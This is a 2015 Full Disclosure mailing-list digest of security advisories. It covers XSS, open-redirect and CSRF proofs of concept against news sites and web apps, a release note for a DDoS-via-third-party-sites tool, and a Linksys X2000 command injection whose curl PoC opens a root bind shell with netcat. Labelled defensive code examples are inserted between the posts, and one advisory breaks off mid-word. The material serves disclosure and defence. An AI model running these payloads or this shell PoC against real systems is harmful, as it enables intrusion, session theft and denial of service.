[FD] Winehat Security Conference

2015-11-02 Thread Lorenzo Primiterra
Hi all,
if nobody has already posted it, I would like to link this new security
event, which is going to be held in Italy but all in English, bringing
together the Italian culture (food, wine, culture) and the InfoSec world.

It will be held in Turin on November 7th and 8th in the Italian Association
of Sommeliers of Piedmont.

The agenda is looking good with speakers from Europe and USA: Dean Sysman,
Philippe Langlois, Michele "antisnatchor" Orru', Matteo Mazzeri, GentilKiwi
and Raoul Chiesa, who seems to be one of the organizers.

The event will be totally free, otherwise I wouldn't have linked it!

Lorenzo.

PS: The website is http://winehat.net

-- 
*Lorenzo Primiterra - mobile developer*
IT number: (+39) 340 5031306 | UK number: (+44) 7807883914
personal website: http://lorenzo.primiterra.it
Skype: nuke88

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] DAVOSET v.1.2.6

2015-11-02 Thread MustLive

Hello participants of Mailing List.

After making the public release of DAVOSET
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html),
I've made the next update of the software. On the 30th of October DAVOSET v.1.2.6
was released - DDoS attacks via other sites execution tool
(http://websecurity.com.ua/davoset/).

Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

GitHub: https://github.com/MustLive/DAVOSET

Download DAVOSET v.1.2.6:

http://websecurity.com.ua/uploads/2015/DAVOSET_v.1.2.6.rar

In the new version, support for comments in the lists was added. Also XXE
Injection in NetIQ Access
(http://seclists.org/fulldisclosure/2015/Jun/103) was added to the list, along
with support for XML requests via GET (e.g. for NetIQ Access). Non-working
services were removed from the full list of zombies.

In total there are 155 zombie-services in the list.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 





[FD] Daily Mail Registration Page Unvalidated Redirects and Forwards & XSS Web Security Problem

2015-11-02 Thread Jing Wang
*Daily Mail Registration Page Unvalidated Redirects and Forwards & XSS Web
Security Problem*


*Website Description:*
"The Daily Mail is a British daily middle-market tabloid newspaper owned by
the Daily Mail and General Trust. First published in 1896 by Lord
Northcliffe, it is the United Kingdom's second biggest-selling daily
newspaper after The Sun. Its sister paper The Mail on Sunday was launched
in 1982. Scottish and Irish editions of the daily paper were launched in
1947 and 2006 respectively. The Daily Mail was Britain's first daily
newspaper aimed at the newly-literate "lower-middle class market resulting
from mass education, combining a low retail price with plenty of
competitions, prizes and promotional gimmicks", and was the first British
paper to sell a million copies a day. It was at the outset a newspaper for
women, the first to provide features especially for them, and as of the
second-half of 2013 had a 54.77% female readership, the only British
newspaper whose female readers constitute more than 50% of its demographic.
It had an average daily circulation of 1,708,006 copies in March 2014.
Between July and December 2013 it had an average daily readership of
approximately 3.951 million, of whom approximately 2.503 million were in
the ABC1 demographic and 1.448 million in the C2DE demographic. Its website
has more than 100 million unique visitors per month." (Wikipedia)


The Alexa rank of one of its websites was 93 on January 01 2015. The website is
one of the most popular websites in the United Kingdom.


The Unvalidated Redirects and Forwards problem has not been patched, while
the XSS problem has been patched.



Discoverer and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing





*(1) Daily mail Registration Page Unvalidated Redirects and Forwards Web
Security Problem*


*(1.1) Vulnerability Description:*
Daily online websites have a cyber security problem. Hackers can exploit it
by Open Redirect (Unvalidated Redirects and Forwards) attacks. During the
tests, all Daily mail websites (Daily Mail, Mail on Sunday & Metro media
group) use the same mechanism. These websites include dailymail.co.uk,
thisismoney.co.uk, and mailonsunday.co.uk.




Google Dork:
"Part of the Daily Mail, The Mail on Sunday & Metro Media Group"



The vulnerability occurs at "&targetUrl" parameter in "logout.html?" page,
i.e.
http://www.dailymail.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fgoogle.com





*(1.2.1) *Use the following tests to illustrate the scenario painted above.

The redirected webpage address is "http://diebiyi.com/articles". We can
suppose that this webpage is malicious.

Vulnerable URLs:
http://www.dailymail.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fdailymail.co.uk
http://www.thisismoney.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fhao123.com/
http://www.mailonsunday.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fpinterest.com


POC Code:
http://www.dailymail.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fdiebiyi.com/articles
http://www.thisismoney.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fdiebiyi.com/articles
http://www.mailonsunday.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fdiebiyi.com/articles




*POC Video:*
https://www.youtube.com/watch?v=AU-HJGe5BWE&feature=youtu.be



*Blog Details:*
http://tetraph.com/security/website-test/daily-mail-url-redirection/
http://securityrelated.blogspot.com/2015/10/daily-mail-registration-page.html





*(1.2.2)* The program code flaw can be attacked without user login. Tests
were performed on Microsoft IE (9 9.0.8112.16421) of Windows 8, Mozilla
Firefox (37.0.2) & Google Chromium 42.0.2311 (64-bit) of Ubuntu
(14.04.2), and Apple Safari 6.1.6 of Mac OS X v10.9 Mavericks.

These bugs were found by using URFDS (Unvalidated Redirects and Forwards
Detection System).





*(1.2) Description of Open Redirect:*
Here is the description of Open Redirect: "A web application accepts a
user-controlled input that specifies a link to an external site, and uses
that link in a Redirect. This simplifies phishing attacks. An http
parameter may contain a URL value and could cause the web application to
redirect the request to the specified URL. By modifying the URL value to a
malicious site, an attacker may successfully launch a phishing scam and
steal user credentials. Because the server name in the modified link is
identical to the original site, phishing attempts have a more trustworthy
appearance." (From CWE)




*(1.3) Vulnerability Disclosure:*
These vulnerabilities have not been patched.








*(2) Daily Mail Website XSS Cyber Security Zero-Day Vulnerability*


*(2.1) Vulnerability description:*
DailyMail has a security problem. Criminals can exploit it by XSS attacks.

The vulnerability occurs at "reportAbuseInComment.html?" page with
"&commentId" parame

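An added example, not part of the original advisory: one way a logout handler could validate the `targetUrl` value described in section (1) before redirecting. The host allowlist, the fallback path and the function names are assumptions made for this sketch.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts the logout page may send a visitor back to (named in the advisory).
ALLOWED_HOSTS = {
    "dailymail.co.uk", "www.dailymail.co.uk",
    "www.thisismoney.co.uk", "www.mailonsunday.co.uk",
}
FALLBACK = "/"  # hypothetical safe landing page


def safe_redirect_target(target_url):
    """Return target_url only if it stays on an allowed host, else FALLBACK."""
    if not target_url:
        return FALLBACK
    # Browsers read "\" as "/" and drop tabs/newlines inside URLs, so values
    # containing a backslash, whitespace or control characters are refused.
    if "\\" in target_url or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target_url):
        return FALLBACK
    try:
        parts = urlsplit(target_url)
        host = (parts.hostname or "").lower()
        has_userinfo = parts.username is not None or parts.password is not None
    except ValueError:  # e.g. malformed IPv6 literal
        return FALLBACK
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept only a single-slash absolute path.
        # "//host" and "///host" are resolved by browsers to another host.
        if target_url.startswith("/") and not target_url.startswith("//"):
            return target_url
        return FALLBACK
    if parts.scheme not in ("http", "https") or has_userinfo:
        return FALLBACK  # other schemes, "//host", and "allowed.host@other.host"
    return target_url if host in ALLOWED_HOSTS else FALLBACK


def logout_redirect(request_url):
    """Apply the check to the targetUrl parameter of a logout.html request."""
    values = parse_qs(urlsplit(request_url).query).get("targetUrl", [])
    # A repeated parameter is ambiguous; treat it like a missing one.
    return safe_redirect_target(values[0]) if len(values) == 1 else FALLBACK
```

The comparison is an exact match on the parsed host name, so look-alike hosts that merely contain or start with an allowed name fall through to the fallback.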
[FD] TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber Attacks

2015-11-02 Thread Jing Wang
*TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber
Attacks*


*Website Description:*
http://www.telegraph.co.uk


"The Daily Telegraph is a British daily morning English-language broadsheet
newspaper, published in London by Telegraph Media Group and distributed
throughout the United Kingdom and internationally. The newspaper was
founded by Arthur B. Sleigh in June 1855 as The Daily Telegraph and
Courier, and since 2004 has been owned by David and Frederick Barclay. It
had a daily circulation of 523,048 in March 2014, down from 552,065 in
early 2013. In comparison, The Times had an average daily circulation of
400,060, down to 394,448. The Daily Telegraph has a sister paper, The
Sunday Telegraph, that was started in 1961, which had circulation of
418,670 as of March 2014. The two printed papers currently are run
separately with different editorial staff, but there is cross-usage of
stories. News articles published in either, plus online Telegraph articles,
may also be published on the Telegraph Media Group's www.telegraph.co.uk
website, all under The Telegraph title." (From Wikipedia)




Discovered and Disclosed By:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing





*(1) Vulnerability Description:*
Telegraph has a Web security bug problem. It is vulnerable to XSS attacks.
In fact, all its photo pages are vulnerable to XSS (Cross-Site Scripting)
vulnerabilities. Telegraph's picture pages use "&frame" as their parameter.
All its web pages that use "&frame" are vulnerable to the bugs. Those
vulnerabilities have been patched now.


*Examples of Vulnerable Links:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278



*POC Code:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095";>
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162";>
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280";>
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790";>
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278";>


The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.02) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 7. The
bugs were found by using CSXDS.




*(2) XSS Description:*
The description of XSS is: "Cross-Site Scripting (XSS) attacks are a type
of injection, in which malicious scripts are injected into otherwise benign
and trusted web sites. XSS attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user within the output it generates without validating or encoding it."
(OWASP)




*Poc Video:*
https://www.youtube.com/watch?v=SqjlabJ1OzA&feature=youtu.be





*Blog Details:*
http://www.tetraph.com/security/website-test/telegraph-xss/
http://securityrelated.blogspot.com/2015/10/telegraph-xss-0day.html





*(3) Vulnerability Disclosure:*
These vulnerabilities have been patched now.





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] Cross-Site Scripting | Zeuscart V4

2015-11-02 Thread ITAS Team
#Vulnerability: Cross-Site Scripting
#Vendor: http://www.zeuscart.com
#Download link: http://zeuscart.com/download/
#Affected version: Zeuscart V4
#CVSS v3.0 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
#Condition: The attack is performed by an "Anonymous User"
#Payload: "-->alert(/ITASVN/)
#Fix version: N/A
#Author: Dang Quoc Thai – thai.q.d...@itas.vn and ITAS Team

::PROOF OF CONCEPT::
+ REQUEST
GET /index.php?do=search&search=%22--%3E%3CScRipt%3Ealert(/ITASVN/)%3C/ScRipT%3E HTTP/1.1
Host: demo.target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.target.com/demo/
Cookie: PHPSESSID=0f9ce01d2822471dee23af07947e9074
Connection: keep-alive

+RESPONSE
HTTP/1.1 200 OK
Date: Mon, 02 Nov 2015 02:21:55 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25032
...




http://demo.target.com/index.php?do=index";>http://demo.target.com/images/logo/20151012210547_sell_logo.png";
alt="ZeusCart">


alert(/ITASVN/)"
onclick="searchitem();"> 
Search

http://demo.target.com/index.php?do=showcart";>Shopping Cart - 0 Items

http://www.itas.vn/en/itas-team-found-out-a-cross-site-scripting-vulnerability-in-zeuscart-cms/
- https://www.youtube.com/watch?v=CPgzAra_mXw  




[FD] CVE-2015-6498

2015-11-02 Thread csirt
###
#
# SWISSCOM CSIRT ADVISORY - https://www.swisscom.ch/en/about/sustainability/digital-switzerland/security.html
#
##
#
# CVE ID:   CVE-2015-6498
# Product:  Home Device Manager
# Vendor:   Alcatel-Lucent
# Subject:  Code vulnerability, remotely exploitable
# Finder:   Dr. Ulrich Fiedler and his team at BFH-TI Biel/Bienne
# Coord:    Philippe Cuany (csirt _at_ swisscom.com)
# Date:     Nov 02nd 2015
#
##


Description
---
A vulnerability has been discovered in the TR069 protocol that can potentially
affect all Automatic Configuration Servers (ACS). The issue has been fixed in
the Home Device Manager (HDM) product from Alcatel-Lucent with an anti-spoofing
filter.  HDM allows service providers to remotely manage CPEs, such as
residential gateways, IP set-top boxes, and VoIP terminal adapters that comprise
a home networking environment.


Product
---
Alcatel-Lucent Home Device Manager, versions prior to 4.1.10 may be affected if
they have no filtering in place, which was provided as a customer specific
extension already by Alcatel-Lucent, or have foreseen other additional
authorization checks.


Vulnerability
-
The vulnerability allows an attacker to perform impersonation attacks by
spoofing CPE using tr-069 (cwmp) Protocol. An attacker could gain unauthorized
access to third-party SIP Credentials for the spoofed device and perform illegal
activities (phone fraud). The vulnerability has been tested and confirmed.


Remediation
---
Update to Home Device Manager Version 4.1.10 (or higher) or 4.2.2 (or higher)
and activate the anti-spoofing filters, in case there is not already a customer
specific filter or authorization check in place.


Acknowledgments
---
Dr. Ulrich Fiedler and his team at BFH-TI Biel/Bienne for the discovery and
notification about the vulnerability.


Milestones
--
Jul 13th 2015 Details about the vulnerability are communicated to Swisscom
Jul 14th 2015 HDM anti-spoofing filter available
Aug 13th 2015 CVE ID requested at MITRE
Aug 18th 2015 CVE ID 2015-6498 assigned by MITRE
Nov 02nd 2015 Public Release of Advisory





[FD] Chyrp CMS 2.5.2: XSS

2015-11-02 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Chyrp CMS 2.5.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Github:       https://github.com/chyrp/chyrp
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability in Chyrp CMS 2.5.2. With this, it is possible to
steal cookies, bypass CSRF protection, or inject JavaScript keyloggers.

The vulnerability exists because the key of all GET arguments is echoed without
encoding.

3. Proof of Concept


http://localhost/chyrp/themes/firecrest/images/dots-green.gif?";>alert(1)=1

4. Code


/includes/class/Theme.php:231
public function javascripts() {
    $config = Config::current();
    $route = Route::current();

    // Each value is passed through urlencode(); each key is appended as received.
    $args = "";
    foreach ($_GET as $key => $val)
        if (!empty($val) and $val != $route->action)
            $args.= "&".$key."=".urlencode($val);

    $javascripts = array($config->chyrp_url."/includes/lib/gz.php?file=jquery.js",
                         $config->chyrp_url."/includes/lib/gz.php?file=plugins.js",
                         $config->chyrp_url.'/includes/javascript.php?action='.$route->action.$args);

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Chyrp-CMS-252-XSS-61.html


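An added example, not code from Chyrp or from the advisory: a Python model of the loop in `Theme::javascripts()` shown in the Chyrp CMS 2.5.2 advisory above, next to a hardened variant that encodes the key as well and escapes the URL for HTML. `quote_plus` stands in for PHP's `urlencode()`, and the double-quoted `<link href>` attribute is an assumption, since the advisory does not show where the theme prints the URL.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote_plus

CHYRP_URL = "http://localhost/chyrp"  # base URL used in the advisory's PoC


def build_args(get_params, action, encode_key):
    """Model of the foreach loop; encode_key=False is the behaviour in the
    advisory (value URL-encoded, key appended as received)."""
    args = ""
    for key, val in get_params.items():
        if val not in ("", "0") and val != action:  # PHP empty() also rejects "0"
            name = quote_plus(key) if encode_key else key
            args += "&" + name + "=" + quote_plus(val)
    return args


def render(get_params, action, hardened):
    """Assumption: the URL ends up inside a double-quoted HTML attribute."""
    url = (CHYRP_URL + "/includes/javascript.php?action=" + action
           + build_args(get_params, action, encode_key=hardened))
    if hardened:
        url = escape(url, quote=True)  # second layer: escape for the HTML context
    return '<link href="' + url + '">'


class TagLister(HTMLParser):
    """Records every start tag and the href value the parser actually sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.href = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "link":
            self.href = dict(attrs).get("href")


def parse(markup):
    """Return (start tags seen, href of the link tag) for a piece of markup."""
    lister = TagLister()
    lister.feed(markup)
    lister.close()
    return lister.tags, lister.href


# Constructed request: the parameter *name* carries markup, the value is harmless.
SAMPLE_GET = {'x"><i>probe</i>': "1"}
```

Parsing `render(SAMPLE_GET, "index", hardened=False)` yields an extra `i` element and a truncated `href`; with `hardened=True` the parser sees a single `link` tag whose `href` carries the whole query string.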

[FD] SQL Buddy 1.3.3: XSS

2015-11-02 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    SQL Buddy 1.3.3
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      n...@deliciousbrains.com
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  08/18/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability via the "requestKey" GET parameter in SQL Buddy
1.3.3. With this, it is possible to steal cookies or inject JavaScript
keyloggers.

Please note that the POC only works if the victim is not logged in.

3. Proof of Concept


http://localhost/sqlbuddy/index.php?ajaxRequest=1&requestKey=";>alert(1)

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/18/2015 Informed Vendor about Issue (no reply)
09/16/2015 Reminded Vendor of release date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/SQL-Buddy-133-XSS-60.html



[FD] SQL Buddy 1.3.3: CSRF

2015-11-02 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    SQL Buddy 1.3.3
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      n...@deliciousbrains.com
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  08/18/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

None of the forms of SQL Buddy 1.3.3 have proper CSRF protection, which means
that an attacker can perform actions for the victim if the victim visits an
attacker controlled site while logged in.

While SQL Buddy does have CSRF protection, it does not work properly. If a CSRF
token is submitted, it has to be correct. However, if no token is submitted,
the check is passed as well.

3. Proof of Concept

Insert a new MySQL user:


http://localhost/sqlbuddy/query.php?ajaxRequest=2807&db=foo"; >


document.myform.submit();

4. Code


functions.php:215
function validateRequest() {
    global $requestKey;
    // Fails only when a requestKey is supplied and wrong; a request without one passes.
    if (isset($_GET['requestKey']) && $_GET['requestKey'] != $requestKey) {
        return false;
    }
    return true;
}

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

08/18/2015 Informed Vendor about Issue (no reply)
09/16/2015 Reminded Vendor of release date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/SQL-Buddy-133-CSRF-59.html


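An added example, not code from SQL Buddy or from the advisory: a Python model of the `validateRequest()` logic quoted in the SQL Buddy 1.3.3 CSRF advisory above, next to a strict check that also rejects a missing or empty key. The function names, the token format and the sample requests are constructed for this sketch; the `query.php?ajaxRequest=2807&db=foo` URL is the one in the advisory's proof of concept.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit


def validate_as_in_advisory(get_params, request_key):
    """Model of validateRequest() in functions.php: only a wrong key fails."""
    if "requestKey" in get_params and get_params["requestKey"] != request_key:
        return False
    return True


def validate_strict(get_params, request_key):
    """Hardened check: the key must be present, non-empty and equal."""
    supplied = get_params.get("requestKey")
    if not supplied or not request_key:
        return False
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(supplied.encode(), request_key.encode())


def params_of(url):
    """Flatten a query string to {name: first value}; blank values are kept."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in query.items()}


def compare(session_key):
    """Run both checks over four constructed requests to query.php and
    return {label: (result as in advisory, result of strict check)}."""
    base = "http://localhost/sqlbuddy/query.php?ajaxRequest=2807&db=foo"
    requests = {
        "valid key": base + "&requestKey=" + session_key,
        "wrong key": base + "&requestKey=" + "0" * len(session_key),
        "empty key": base + "&requestKey=",
        "no key": base,  # the shape of the request in the advisory's PoC
    }
    return {label: (validate_as_in_advisory(params_of(url), session_key),
                    validate_strict(params_of(url), session_key))
            for label, url in requests.items()}


SESSION_KEY = secrets.token_hex(16)  # constructed per-session token
```

Only the "no key" row differs between the two checks: `(True, False)`, which is the gap the advisory describes.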

[FD] Unauthenticated remote command execution on Cisco Linksys x2000 routers

2015-11-02 Thread Lorenzo Pistone

Hello,
I have found on my router, a Linksys X2000, that there is a poor 
validation of the IP target in the ping diagnostics web page 
(http://$router_ip/Diagnostics.asp). This can be used to execute 
arbitrary commands as the root user on the device. It appears that there 
is no need for authentication to exploit the flaw, so this is 
exploitable from WAN if the administrator has activated remote 
management from the web UI.


The web interface is managed by process /bin/httpd. The diagnostic web 
page accepts a user-supplied IP to run a ping test on it. This user 
value is truncated at the first occurrence of the characters " ;<>" in 
an attempt to make the user-provided string safe when appended to 
"/bin/ping " and passed to system(). However, this is not sufficient at 
all to prevent the injection of shell commands. In fact, spaces for 
arguments separation can be replaced by tabs and semicolons with new 
lines. This allows arbitrary remote command execution with root privileges.


To exacerbate the issue, it appears that there is no need for any 
authentication to trigger the ping diagnostic. I have tested this on LAN 
and it works. Regarding remote access, I failed to get remote access to 
work at all, because for some reason when I enable it a rule to the nat 
table is inserted to drop packets directed to the web interface, before 
the rule that honors the "Remote Management Port" field in the web 
configuration. I do not know why this happens and if it is intended 
behavior. However, by using the root shell from LAN to remove this 
iptables entry, I could successfully exploit the flaw from WAN too.


This is the POC:

   # activate the shell by requesting a ping test to a special ip string
   # ("busybox nc -e /bin/sh -l -p 1234")
   curl -s \
     --data submit_button=Diagnostics \
     --data change_action=gozila_cgi \
     --data submit_type=start_ping \
     --data action= \
     --data commit=0 \
     --data nowait=1 \
     --data ping_size=32 \
     --data ping_times=5 \
     --data-urlencode ping_ip=$'\nbusybox\tnc\t-e\t/bin/sh\t-l\t-p\t1234' \
     $router_ip/apply.cgi >/dev/null &
   # access the shell
   nc $router_ip 1234
   # now can execute any non-interactive shell command

I suspect that there are similar issues with the traceroute diagnostic, 
and in adding port forwarding entries. A more blog-y description of the 
issue, including the assembly locations that fail to properly sanitize 
the user value, can be found here 
http://meat.pisto.horse/2015/11/rooting-linksys-x2000-router-system.html


Cheers.
Lorenzo Pistone

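An added example, not taken from the post or from the router firmware: a Python model of the truncation filter described in the Linksys X2000 message above, showing why cutting the input at `" ;<>"` still lets a newline and tabs through, next to a strict alternative that parses the fields and builds an argument vector for an exec-style call with no shell. The sample inputs use a harmless `echo`, and the numeric limits and `ping` options are assumptions.

```python
import ipaddress
import shlex

FILTER_CHARS = " ;<>"  # the post says input is cut at the first of these

# Constructed inputs for the ping_ip field.
CLASSIC = "192.0.2.1; echo injected"     # stopped by the truncation
BYPASS = "192.0.2.1\necho\tinjected"     # newline and tab are not in the filter


def truncate_like_firmware(value):
    """Model of the described filter: keep what precedes ' ', ';', '<' or '>'."""
    for index, char in enumerate(value):
        if char in FILTER_CHARS:
            return value[:index]
    return value


def commands_seen_by_shell(ping_ip):
    """What sh would run for system("/bin/ping " + filtered value): one word
    list per command (a newline ends a command, a tab separates words)."""
    line = "/bin/ping " + truncate_like_firmware(ping_ip)
    return [shlex.split(part) for part in line.split("\n") if part.strip()]


def bounded_int(text, low, high, name):
    """Parse a decimal field and enforce a range (limits are assumptions)."""
    if not (text.isascii() and text.isdigit() and low <= int(text) <= high):
        raise ValueError(name + " must be an integer in [%d, %d]" % (low, high))
    return int(text)


def ping_argv(ping_ip, ping_times="5", ping_size="32"):
    """Hardened alternative: validate every field, then return an argv list
    meant for execv-style execution, never for a shell command line."""
    address = ipaddress.IPv4Address(ping_ip)  # raises ValueError on any extra byte
    count = bounded_int(ping_times, 1, 10, "ping_times")
    size = bounded_int(ping_size, 1, 1472, "ping_size")
    return ["/bin/ping", "-c", str(count), "-s", str(size), str(address)]
```

`commands_seen_by_shell(BYPASS)` returns two commands while `ping_argv(BYPASS)` raises `ValueError`, so allowlist parsing of the whole value closes what the character denylist leaves open.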